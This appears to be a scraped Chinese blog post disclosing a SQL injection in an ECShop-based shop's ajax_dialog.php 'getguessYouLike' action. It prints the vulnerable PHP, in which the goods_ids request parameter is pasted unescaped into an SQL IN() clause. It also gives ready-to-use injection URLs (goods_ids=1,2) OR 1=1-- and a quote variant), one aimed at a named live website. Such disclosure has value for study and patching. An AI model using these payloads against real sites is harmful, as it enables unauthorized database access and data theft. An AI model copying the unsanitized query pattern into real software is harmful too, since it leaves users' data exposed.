http://xxxxxxxx/ajax_dialog.php?act=getguessYouLike&goods_ids=1,2%27%20OR%201=1--%20hack
$goods_ids = !empty($_REQUEST['goods_ids']) ? trim($_REQUEST['goods_ids']) : '';
$warehouse_id = empty($_REQUEST['warehouse_id']) ? 0 : intval($_REQUEST['warehouse_id']);
$area_id = empty($_REQUEST['area_id']) ? 0 : intval($_REQUEST['area_id']);
$type = empty($_REQUEST['type']) ? '' : trim($_REQUEST['type']);
$goods_list = array();
if ($goods_ids) {
$goods_list = get_floor_ajax_goods(0, 0, $warehouse_id, $area_id, $goods_ids);
}function get_floor_ajax_goods($cat_id = 0, $num = 0, $warehouse_id = 0, $area_id = 0, $goods_ids = '', $user_id = 0)
{
$leftJoin = '';
$tag_where = ' AND g.is_on_sale = 1 AND g.is_alone_sale = 1 AND g.is_delete = 0 ';
if (0 < $cat_id) {
$children = get_children($cat_id);
$tag_where .= ' AND (' . $children . ' OR ' . get_extension_goods($children) . ')';
}
if (0 < $user_id) {
$tag_where .= ' AND g.user_id = \'' . $user_id . '\' ';
}
else {
$tag_where .= get_rs_where($_COOKIE['city']);
}
if (!empty($goods_ids)) {
$tag_where .= ' AND g.goods_id in (' . $goods_ids . ') ';
}
if ($GLOBALS['_CFG']['open_area_goods'] == 1) {
$leftJoin .= ' left join ' . $GLOBALS['ecs']->table('link_area_goods') . ' as lag on g.goods_id = lag.goods_id ';
$tag_where .= ' and lag.region_id = \'' . $area_id . '\' ';
}
$leftJoin .= ' left join ' . $GLOBALS['ecs']->table('warehouse_goods') . (' as wg on g.goods_id = wg.goods_id and wg.region_id = \'' . $warehouse_id . '\' ');
$leftJoin .= ' left join ' . $GLOBALS['ecs']->table('warehouse_area_goods') . (' as wag on g.goods_id = wag.goods_id and wag.region_id = \'' . $area_id . '\' ');
if ($GLOBALS['_CFG']['review_goods'] == 1) {
$tag_where .= ' AND g.review_status > 2 ';
}
$sql = 'SELECT g.goods_id, g.cat_id, g.goods_name, g.market_price, g.model_attr, ' . ' IF(g.model_price < 1, g.shop_price, IF(g.model_price < 2, wg.warehouse_price, wag.region_price)) AS org_price, ' . 'IFNULL(IF(g.model_price < 1, g.promote_price, IF(g.model_price < 2, wg.warehouse_promote_price, wag.region_promote_price)), g.promote_price) AS promote_price, ' . ('IFNULL(IFNULL(mp.user_price, IF(g.model_price < 1, g.shop_price, IF(g.model_price < 2, wg.warehouse_price, wag.region_price)) * \'' . $_SESSION['discount'] . '\'), g.shop_price * \'' . $_SESSION['discount'] . '\') AS shop_price, ') . ' g.is_promote, g.promote_start_date, g.promote_end_date, g.goods_brief, g.goods_thumb, g.goods_img, g.product_price, g.product_promote_price ' . 'FROM ' . $GLOBALS['ecs']->table('goods') . ' AS g ' . $leftJoin . 'LEFT JOIN ' . $GLOBALS['ecs']->table('member_price') . ' AS mp ' . ('ON mp.goods_id = g.goods_id AND mp.user_rank = \'' . $_SESSION['user_rank'] . '\' ') . 'WHERE 1 ' . $tag_where . ' ORDER BY g.sort_order, g.goods_id DESC';
if (0 < $num) {
$sql .= ' LIMIT ' . $num;
}
$goods_res = $GLOBALS['db']->getAll($sql);
foreach ($goods_res as $idx => $row) {
if (0 < $row['promote_price']) {
$promote_price = bargain_price($row['promote_price'], $row['promote_start_date'], $row['promote_end_date']);
}
else {
$promote_price = 0;
}
$price_info = get_goods_one_attr_price($row, $warehouse_id, $area_id, $promote_price);
$row = !empty($row) ? array_merge($row, $price_info) : $row;
$promote_price = $row['promote_price'];
$goods_res[$idx]['is_promote'] = $row['is_promote'];
$goods_res[$idx]['goods_img'] = get_image_path($row['goods_id'], $row['goods_img'], true);
$goods_res[$idx]['goods_thumb'] = get_image_path($row['goods_id'], $row['goods_thumb'], true);
$goods_res[$idx]['market_price'] = price_format($row['market_price']);
$goods_res[$idx]['shop_price'] = price_format($row['shop_price']);
$goods_res[$idx]['promote_price'] = 0 < $promote_price ? price_format($promote_price) : '';
$goods_res[$idx]['shop_price'] = price_format($row['shop_price']);
$goods_res[$idx]['short_name'] = 0 < $GLOBALS['_CFG']['goods_name_length'] ? sub_str($row['goods_name'], $GLOBALS['_CFG']['goods_name_length']) : $row['goods_name'];
$goods_res[$idx]['url'] = build_uri('goods', array('gid' => $row['goods_id']), $row['goods_name']);
}
return $goods_res;
}view-source:http://secake.com/ajax_dialog.php?act=getguessYouLike&goods_ids=1,2)%20OR%201=1--%20hack
7797
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
